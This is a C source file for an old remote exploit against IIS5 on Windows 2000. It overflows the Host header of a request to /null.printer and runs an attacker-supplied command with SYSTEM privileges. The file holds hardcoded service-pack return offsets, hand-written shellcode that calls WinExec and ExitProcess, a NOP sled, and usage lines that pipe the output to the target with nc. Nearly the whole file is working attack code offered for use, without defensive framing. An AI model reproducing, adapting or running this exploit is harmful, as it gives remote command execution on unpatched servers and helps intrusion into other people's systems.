/*
 * <tuka2.c> Remote SYSTEM level exploit for IIS5 / Win2000
 *
 * The Dark Raver - darkraver@t0s.org (10/05/2001)
 *
 *
 * Tested on SP0 & SP1 - Versions Spanish & English
 *
 * Usage: ./tuka <version> <"command"> | nc <host> <port>
 *
 */


#define OFFNUM 356
// call *%ebx in kernel32.dll
#define OFFSET0 0x77e81674 // Windows 2000 SP0 - Spanish & English
#define OFFSET1 0x77e82a56 // Windows 2000 SP1 - Spanish & English

#include <stdio.h>


char hell[100];

char hell0[100]=
"\xeb\x0e" // start: jmp back
"\xb8\x01\x86\xe9\x77" // movl $0x77e98601, %eax -> winexec
"\xff\xd0" // call *%eax
"\xb8\xbb\xb0\xe9\x77" // movl $0x77e9b0bb, %eax -> exitprocess
"\xff\xd0" // call *%eax
"\xe8\xed\xff\xff\xff" // back: call start
"cmd.exe /c "
//" net send 172.18.1.14 test"
//" & dir "
//"\x00"
"";

char hell1[100]=
"\xeb\x0e" // start: jmp back
"\xb8\x0e\xb5\xe9\x77" // movl $0x77e9b50e, %eax -> winexec
"\xff\xd0" // call *%eax
"\xb8\x2d\xf3\xe8\x77" // movl $0x77e8f32d, %eax -> exitprocess
"\xff\xd0" // call *%eax
"\xe8\xed\xff\xff\xff" // back: call start
"cmd.exe /c "
//" net send 172.18.1.14 test"
//" & dir "
//"\x00"
"";

char nops[]=
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90"
"\x90\x90\x90\x90";


main(int argc, char **argv) {
int offset=0;
char buf[OFFNUM+1];
int i;

if(argc!=3) {
	printf("Uso: ./tuka 0 \"net send 172.18.1.14 test\" | nc x.x.x.x 80\n");
	printf("0 = SP0 / 1 = SP1\n");
	exit(0);
	}

if(!strcmp(argv[1],"0")) {
	fprintf(stderr, "Using SP0 values\n");
	offset=OFFSET0;
	strcpy(hell,hell0);
	} else {
	fprintf(stderr, "Using SP1 values\n");
	offset=OFFSET1;
	strcpy(hell,hell1);
	}

printf("GET /null.printer HTTP/1.0\n");

printf("Host: ");

for(i=0;i<OFFNUM;i+=4)
	*(int *)&buf[i]=offset;

buf[OFFNUM]=0;

printf("%s", buf);

printf("%s", nops);

strcat(hell, argv[2]);

strcat(hell, " & dir \x00");

printf("%s", hell);

printf("\n\n\n\n");

}